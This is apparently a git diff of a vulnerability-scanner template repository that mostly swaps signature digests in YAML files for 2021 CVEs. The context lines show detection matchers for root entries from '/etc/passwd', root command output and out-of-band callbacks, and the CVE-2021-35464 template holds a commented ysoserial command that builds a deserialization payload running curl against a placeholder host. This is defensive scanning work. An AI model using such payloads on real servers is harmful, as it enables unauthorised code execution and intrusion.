b/http/cves/2021/CVE-2021-31602.yaml index ab17ac7473..a36ddfbc46 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008bc70d06d43fd8bdb3ad8f830ef19bf1b4849e1d1e5073789d8b9ed29881747a022100c53d6d51fbcfd7ee4ada2c36666e44148ff4ea26623f1ba33ad111633bf453ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b20f5210d82b91df56e02e31d6a9763a30eff9a4100b762b241765f8461ecc902202ed9fd016ed7195c98aa74ceb838c9ec37d2881487181f3e3b53e7759bf73664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 3068d76bfe..11016730e1 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009ebcb1ee8c45888c514b32987b94795348c56e452ad1ad64486523b89e346e9802210088e879fcea852853cdf91ed44d993a35eaabe332f76cb7a52d7f62fce2955dd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de541093311a11b542ffb55fadd51a1ae533297011c9b779a1fda633748ed8c6022021e04972005fa23af21f046c557622c7542ff0c37f40ec7175b5c4b568946c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 49739deaaa..243f270e1d 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -67,4 +67,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022028bad9749b9ae4d945e0cde1a909d8f43e8fdb919b6f9a579fe65f9ab72b95ef022100e3abdfd25fa01e8d16246da58b8e0307af0381a5023cd306e574029b2fb13653:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff844272245f33847521beaf92d726ec3e67f551a6b2a6cdf295788bbf2c0914022100c92f768757abb4e3052e6f1925024990541677ea661ab561437f14dc93135095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 27ff28a506..0e64b0cd44 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -55,4 +55,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a00463044022064d1be9f5d7a1bf3459780fa37e408c640727b9308a51f197ed5253618aaaadf02204ed66a55a7347bd65e48b20fc814433d92dc31b9bb2d36e63a278a3729fa4a74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202670e85cee6ac1c14bec5a1cae966f5371ff911930beca339a2ed511e13ec10f02203e011c781a7c50c27fd7da696e81e67009c165b06ac48d75d2f42d8ebd0e23c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32682.yaml b/http/cves/2021/CVE-2021-32682.yaml index fb1ab567f9..0be685bf3e 100644 --- a/http/cves/2021/CVE-2021-32682.yaml +++ b/http/cves/2021/CVE-2021-32682.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a314ae51f73020c583762773eef6341d8df801ba4e0682eddf2da2a1f66b6a68022100f1898d30cc26e927ae9ebd0fda45824ae2c86fda77f438b8c2838cef00a7b8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100891445582747005f77c467433863b81c6f5d744aa8c6ee883640d50d73ac05ed022044c7e78a8d9b27f194c849acd9752e062f115f3ce036d46d7a8562613bbe948b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32819.yaml b/http/cves/2021/CVE-2021-32819.yaml index ebe04e5e7c..3fe5113886 100644 --- a/http/cves/2021/CVE-2021-32819.yaml +++ b/http/cves/2021/CVE-2021-32819.yaml @@ -46,4 +46,4 @@ http: part: interactsh_request words: - "User-Agent: Wget" -# digest: 4b0a00483046022100aa7ca2c92f79ac28fd2150b51227335436fd18e936100074e82d284f2198fd38022100cae16de21e1e26871dbb8f7a3b598d17d4ed865611dbec02cdc8e762181bcceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207dce9670325772f33d96c8cf54f7a6aeafb7d999653a9ad55eff5030b2d18484022100b6c92dcbedcae2169c93167270a774c7c16fcd0dc6c3c4ad6631b8828401fa04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3293.yaml b/http/cves/2021/CVE-2021-3293.yaml index 7e60b23e15..fa1614a9b2 100644 --- a/http/cves/2021/CVE-2021-3293.yaml +++ b/http/cves/2021/CVE-2021-3293.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210096f3228cc4d490adee40d190e6f8d36714ca2e536391b5d273c5a498468135e3022055c714b2300176f083a94f6f93884821c80b2f2a760acd3453b6f62efaef4744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070ed642a9eacc3c0cf89d4dda3fd0efda7850c8c5168dd0a62b9213d082cd14a022100d6e4b3ffaa036f6164a73a4bdc9c20f8669d402dcc2a9b345f7326272eb1ea39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33544.yaml b/http/cves/2021/CVE-2021-33544.yaml index 316579151c..9d4a979a72 100644 --- a/http/cves/2021/CVE-2021-33544.yaml +++ b/http/cves/2021/CVE-2021-33544.yaml @@ -41,4 +41,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100f37bc917cbc8b527d545f16cfed837d2affcbba4fa29c559bdf237631cfd5b0e022100d96a76e1037df09d7c06602c2e942944102c3c42fe92225ea7aa74c76e9100b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031d428ee41406afd4cd6e1ba26d2ebcc806cb5cf08bcfde9d82c5e0e3c7495a302210090ce4acfbf3d2f45b26125b5859539772dc9b1fb37b1e4e5f3732789568c6316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-33690.yaml b/http/cves/2021/CVE-2021-33690.yaml index 90f483b42a..ebefc884bc 100644 --- a/http/cves/2021/CVE-2021-33690.yaml +++ b/http/cves/2021/CVE-2021-33690.yaml @@ -52,4 +52,4 @@ http: part: body words: - "Could not connect to the CBS" -# digest: 4a0a0047304502201b6ba3203b011324eb5d2ee382e3c671a635478858a9741f679d59e46179f8a3022100b58f6e6bbfa8bfe46dd8c9957f43eb2674510800e350f3db9b7f7c191719338a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b04d3e58c5a291ea1049c8109590cefb9a6ffe236cfc62ca3bef9cb18342d693022100cdeba09073d30a683569c52811fe86c94e9c35394b1501bbe617ab14b3110c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-34473.yaml b/http/cves/2021/CVE-2021-34473.yaml index 9a328c8e7f..8df6ecf6b4 100644 --- a/http/cves/2021/CVE-2021-34473.yaml +++ b/http/cves/2021/CVE-2021-34473.yaml @@ -51,4 +51,4 @@ http: - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" - "Exchange MAPI/HTTP Connectivity Endpoint" condition: or -# digest: 4a0a00473045022100a05e71e316d5e5706b9faae16b076bdd8ba52969ad1a907f409494b8ceb0f3c002202f939aad5ecfa6df83bc6e2d8876dbc1895c9452ffe5d9adc04d4b8046ad467c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad42ea3fcb775f61e31a2c141f118c7214397ee6547fa562418b4d616704a5b7022076434866fae6a4f826f440f37bd4e9f7fe71812d116338900a0e52caf440220c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35250.yaml b/http/cves/2021/CVE-2021-35250.yaml index 7a628b7c10..f782729d75 100644 --- a/http/cves/2021/CVE-2021-35250.yaml +++ b/http/cves/2021/CVE-2021-35250.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022100bce1f617ac227ba0837acb023dea78f11fbd4f6a484ac4c589f4df2f8ece918c0220311c324b5779561a9c5f3a0981e3cd3993d4fae347ceee717a4c7c646fbfa21a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220090501ead5ca270506d7ae118f516c32825196a8c9f555bb0f769c4d403cc12a022100b5b32adb45f35376c6085ba0dec2d68006c68f0ae293848f2541bf8838b99948:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35265.yaml b/http/cves/2021/CVE-2021-35265.yaml index 7c44f4757d..e789ccc981 100644 --- a/http/cves/2021/CVE-2021-35265.yaml +++ b/http/cves/2021/CVE-2021-35265.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a3ec396f8fd2b09a35def8176981fdae597025b6868c35b6c48b4522801b6d010220412b41c23251d8c2d7eba6177e500fdb0c784afbf180103bcdd059bdd2623f1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e7847514ecfd6e61a3765e29a67cc15f37c5ef49a69ab726aaea4405cce80dd0022034479cb2ed0910933e5d0945bbfa123d831278e440f7da24eff96193e8030b55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35323.yaml b/http/cves/2021/CVE-2021-35323.yaml index 1992bae6dd..5861e7a348 100644 --- a/http/cves/2021/CVE-2021-35323.yaml +++ b/http/cves/2021/CVE-2021-35323.yaml @@ -61,4 +61,4 @@ http: regex: - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"' internal: true -# digest: 4a0a00473045022032cea10cfe2c27c8f06a3a4d1af7a5f3386caf73473c6483fd0df3b4bea40945022100919da458a0416cd6205d3f542c2f118ce6764e45d01de619621fb1db132866e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091253952bc166912922183e2e50d68a18eb9ebd0947c407ac2a5761ba4fb0ae4022100c5fcc25f192bd94fb2e63387b3e1f6caab70397c331a71ad7e33ed78519f01a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35380.yaml b/http/cves/2021/CVE-2021-35380.yaml index 5df0c0315c..80c4edd06b 100644 --- a/http/cves/2021/CVE-2021-35380.yaml +++ b/http/cves/2021/CVE-2021-35380.yaml @@ -43,4 +43,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a0046304402201049687d7055f539322e4410a7114608b1866683ac30c589fc9f8b1207b39bac022031fcf5d29996d0c09d94724b89f5f871ca1112d0c801d367951c80f2f395de11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009072fe1d0473fca0a0eec04089db37692674bb003d19077f1abe104a7de5f13e022100ca18722c70eaec2a2d9498923f1f2b1688a806fbcc4e6d16d2a20629e772d968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35464.yaml b/http/cves/2021/CVE-2021-35464.yaml index 75bf911c4a..016dfae7e2 100644 --- a/http/cves/2021/CVE-2021-35464.yaml +++ b/http/cves/2021/CVE-2021-35464.yaml @@ -63,4 +63,4 @@ http: # {{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession= # java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' -# digest: 4b0a00483046022100a9dc1dbcd9a5743b604c50f16fa9cbf86ff32882259ea53c23844cab4fdc2834022100feb69f3f71ef9bb3b55d9aef1969fdec5eb48f4d20217becf055fa96d47ea48c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010bdf77d30b0cc3f4fc12a3c2e848b7680ca5bbe0c871aad125c5b9b185489c202200baa727f3a66558b0ca0dc0bc6b2fe0af6e48cb0cadee9337f7ccae9073a2b01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35488.yaml b/http/cves/2021/CVE-2021-35488.yaml index 8c8d8d6662..6a5eaecf00 100644 --- a/http/cves/2021/CVE-2021-35488.yaml +++ b/http/cves/2021/CVE-2021-35488.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 401 -# digest: 4a0a00473045022038395eec45a2fcbac960afbd8bd53a25a914bcc2f4375d12483be8cc15f4ff27022100b5684d7bca5fabf6916b2aa399a5ce877ab067bdf24985182742d8fa022443ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d39e5c3676eded54392c719daceba064fa0cde09a56eca387e37596bc2bf058022013e511ae16681f5dcf6cbd938fc2760bcc7ee1a7967746bcd4ff6afaeba72451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-35587.yaml b/http/cves/2021/CVE-2021-35587.yaml index 67895a4fe6..d8f2fa20a5 100644 --- a/http/cves/2021/CVE-2021-35587.yaml +++ b/http/cves/2021/CVE-2021-35587.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200156c6aef9781a725ef66c1df8f983ffa1e6c0179943ed27cf53c8c951bc743c022100849d78e05cf210611eb95423b7697aafba4308582f6fa47fafed2dd87da6c331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf04eadf24dff0360bd0b9c0a9fc7132329a67804f9269ba963a2d957e2c4604022100f05f70423637edf33b3100c32c4f6fb4c29bcba7d120603b9f2797bd1914c246:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36450.yaml b/http/cves/2021/CVE-2021-36450.yaml index 51263829b4..f746e87a25 100644 --- a/http/cves/2021/CVE-2021-36450.yaml +++ b/http/cves/2021/CVE-2021-36450.yaml @@ -74,4 +74,4 @@ http: - 'csrfp_login=([a-zA-Z0-9]+);' internal: true part: header -# digest: 4b0a00483046022100ab74c53210064e1139328949173dc23d52589b50b129169081cffa1bf655623a022100dac9a66a7541d090f92b37ff4f967c7f03a4ca2b95f83a68fb912c3dd3294944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e0d23882ea6dcde31d9492018606ce4ed4e4ae17f2bec81b0d1c1a7c6e03b47022100c62d9af7176d23599fd1b4cedc95379cd05fbd8b0fa75bf3a324d149a3954054:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-36580.yaml b/http/cves/2021/CVE-2021-36580.yaml index 045e9f7006..1769381d5c 100644 --- a/http/cves/2021/CVE-2021-36580.yaml +++ b/http/cves/2021/CVE-2021-36580.yaml @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402203658bcc3d1c5b432ca051e70dc234752f08022da157d5d1a5f1343cf6ee0f67902207c76bb85ccf16cb7c5f30f14ea8a80bbafe97058e6d4d0b644d3f4761857cfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd0516743a2bf2fbc96cd8280f2601b3800e6531a8eeede224534e417fef0a1b022100e864cb99a24030ccdd014371e8f9fde1603e9b0f40e955124aebf3f1f8edf7db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37304.yaml b/http/cves/2021/CVE-2021-37304.yaml index 958d9aadf4..8315808296 100644 --- a/http/cves/2021/CVE-2021-37304.yaml +++ b/http/cves/2021/CVE-2021-37304.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c8f40985bb5df8fe07810aeeef5fe75588c3bffc32a03b05ac321b1471ba8e5022100d1e1f8ca4a4399db1c9fef4e77c982a20ec7f83cb5626523c4084d2e5891f5f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220395cb8f1865785c5cc12930a64a1e84a1385fe52cfd2c73c3417698e8c389c0e022100a65ef6b723d99837038b9c58d7f139d759d5517af9afa3864897a35ec641e673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37305.yaml b/http/cves/2021/CVE-2021-37305.yaml index 8260585af9..254676c976 100644 --- a/http/cves/2021/CVE-2021-37305.yaml +++ b/http/cves/2021/CVE-2021-37305.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204e94ab3ff2465df0f0bd94bc8f51df93a0d739cc45edbea2446150bbbb4913de022100a1e6430e740172a2e6a1bb5e76bff6640274c4c1b91d1b31f93e30937bc954b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201737e2d799f1ffaa8501b7c2809fd8d5b5297e58bb45ed943ca9cf9772c8e171022061ebbfbbc0fba4e7506742fad30be8853dbca1ae30fb47390133da8405d7a8a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37416.yaml b/http/cves/2021/CVE-2021-37416.yaml index bcc936498f..68218fa99a 100644 --- a/http/cves/2021/CVE-2021-37416.yaml +++ b/http/cves/2021/CVE-2021-37416.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f56157cdfe11052f9683e3d1e537fa7c3597f6f58f376cbe3c55d1d4152a71d3022100d91870d067693baa163178f83d1a79311a718a354422a707e8b845af54b2bac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f55f780fc5e337c9151fea07edce5c9488316e1c133f7a324972cebb28e6b670220639a6fd8ef3ac12f9a1aed3c26c705f148b4b47f012d014d23b051e7997e32f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37538.yaml b/http/cves/2021/CVE-2021-37538.yaml index fd7d491e89..8cd433dadb 100644 --- a/http/cves/2021/CVE-2021-37538.yaml +++ b/http/cves/2021/CVE-2021-37538.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022011cbd06cd63cb7a0c676dba12bbe41936a17f1692c6e859d452ad633dc77e77c0221009527cd2a263c8792320276643854160869ac14841d75ba7676bf0a8d3340c0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201e7979975291a75e819f5907e0e08c70248cf07b1c2b568fb71c849c8b0d7d30022100ae4a380f5766d0e4063b517ac229f60b220bc18fc33e5f9af548dc0f64df230b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index 09cad85e3b..08978bc5fb 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d4c54e2101d5771fb2126256511522a98c666533ee7712f2a45521a7a0f799270220518eda59726c72b34c97b2c12af0322bce2e6f98b97fed5cd71cf2ded4c6e046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220224b28a038bf41d84e87f284cdc8564e8ea80182e443c77c8a90a87f46dce895022100897c255708a7b0ca36b2ae36041f7e9351e808b85b7e2da4fd3aee9fe8538b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 956545d288..7ec64b8de1 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -88,4 +88,4 @@ http: regex: - type="hidden" value="(.*?)"> internal: true -# digest: 4b0a00483046022100e74f9ac2c2f510a6a5cc881445af090226068bbbf1a6ce1faf4e243977148e9b0221008cfa692be823cb8b62ef4510c769823c0aca951e4ba3696cf56bef2e21d0f23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100862fd748d4c50cb37ac09a5402ed868b287079aab7c064db77d3a0963747ee48022100f104021877908de11d67c6c99aa7172e0ef84440b62d047a84ca4a3f6a9ce2d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index b67e4fcec5..70d6c723ac 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -77,4 +77,4 @@ http: - '' - 'uid=0(root) gid=0(root) groups=0' condition: and -# digest: 4a0a0047304502206af18db77891961bb08ab842031ca9857e34aeb1ecac121d6e3a2658d0def036022100f3712fcda08491956c1e412cd46636040d1853b3d659d0f1ac3dc1319f8a3456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075766ea7d42285a510f8cf5bbf152b2127b7ddd4e45ac1ffa62fd966e454bda302202136133cbcfdff83d89b7a884f9f17c89e4148e08ad866458c74a811d4f48201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 6cef68fae9..643c21778d 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200132d28b9ece1813c2cbff293d1769670075b3a8fc3e668bed95a068ed7993c80220557dec056c887098af52c27ba581fc7e7d6f4151e9b37b2edadbd1a693f0c329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008307df6574050ba4ba90fb4ed9e0e55338b71e5fc19311f8bb071cadb5c14a8e02203ad6b7e000efb1b2de13b1d2a7cc99160c646c1bcfced9131000928654197c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index d346a368bb..4c91ba4924 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d403330f10efac52c9115d6f86b8203afbd89a11548fcabd8cbb223b1901297b022100f557cc58343805a3b938dfc6b41aa4bdc6656b57ac2bfad9ed9eab9f15359a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c9de711b9786c049f73c15b0223611bef7cb5071f7c90fffa3216428df1c0cf022100d0de84a185ff234412a326bd15ec0e53cda0c64981c4d4c3eb436f7698cb3dd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 3615ebc08b..f459008d9e 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -119,4 +119,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100833e5bcb2f394e9487e537025c26bcfbcc2b936b06eb1849e65851e1d44d86da022100b217b08be73723a93bb1293669baa2cb9859cc6954ad0ac642642a99e07df0d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e872d0537d5e4fe3dbbbffd4e676ea5a5035aa248c077fb48004f58cbe3f638402202e083699a4a7e88a87d2744f981913d3da140cb66f73911e809f3ddc3927e822:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index db9f396dd3..9e0def5965 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -73,4 +73,4 @@ http: part: interactsh_request words: - "User-Agent: Java" -# digest: 490a00463044022066c9ce151ee358bbe8455f9b617c8364fb827e63a620fb317affb71e693de0e102200a11031cf4158ec89817f2f860b0878dd4f93c94685a0e1e5d0a7ce837143d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220514bbbb54cfb14f5553275a4d456acaa6d46f68655cf3f130777cd445e45f90702204e530c6940ec5efdc46b19a6029292334ce0c0598fdc86d33b4b6f4fbd4b9541:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 6605024636..27d822f94e 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022009a97f597a540e6741f3229b70b1b29fa0a641ce0915cd34c494cea557874333022031a39d9dc34a51219e3281440d3bfefc61c0be8ec107cb5903f637348fa7675f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ef8933c26d5bda7c563e90fcacd767ac9ec4ada1dd5bf689cc80b1f8d3c69ea6022100f38cdc492606d34fa5636a4a7bbb58c0c4cc7f7d38b86aa6ea6c4edb4fb8c974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 1641a6da4d..b394812c4a 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022078990d8e76d7d0907f53325cf4377dffd1589c040424ba73eed6ea24d08167a8022100dc794e1260b3b791daed6f880cdb41518a2a4f9b170fd99319c356adb635b0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207e9b24a1747457b78b3de593e82daabafbcad2855b95325053d197d939f328f802203cf1366c6c9c22a17e1b93d35a051583257976688e5a0f2725563b971437374b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 815d950a97..e6b6d618cc 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220233e3ffbcf46436ba3a74ab76895ea774a623af8e1f44e28bb5fccbec915615e022007de70ce0060d07208fef78311d18a2f5acf3f43240aa92c7c751447062e05c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff90af6fd36be0ea77850c067eb0057997168682f4b62fc1d39046ecf73491a20220352716a8636d0ff2b193d10b21f97ddcd5934e1d0c90013c62e43735b2d00701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 35fab8044a..a65d52ac32 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e9544ea2a99ec897b7871a37a22dbe9bccc8b1ec287bd257eefcd143ba43c9b0022100cdfc5ef7b6494c579c2c558f7ea57a2811e5485f5f62b6070ae617a8b1b94dbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b9d132675c19483b17ba9ffc643adc921660b1c464de08fd15a38799c2774b4022100eb66dfa300fd889b0b0c1c1a1a526d8e39519b44cbe350292b7596ef8bc997d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index de2aed67f7..8182f45c54 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4b0a004830460221008a70a7f35b960fece64c3923d415e8d8d093c3b64e0bf91ec7780c1feb4429e80221008ce9c58c3d00728d31eba4e7e89412be2bd7044ab133bc6e2caddea02a7ba66d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096341e14bddae7dbec5603a2a7c3e83f021657918e6e9046b5c0d7d99252503b022030c08b7901941daee9db9f85a57e63845bf86819986ec02822b159be5ae1f28d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index e151ef9c10..90f55d3d47 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200f67ff446428cbaabbc3fbcd9a29b01b1ab220221767f2b5834e1abe70ba95ce02205a46ec53896c9c2628f41578ebdb0ce5f9f9a3e8c71b06fe6ee90d2543ac9a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 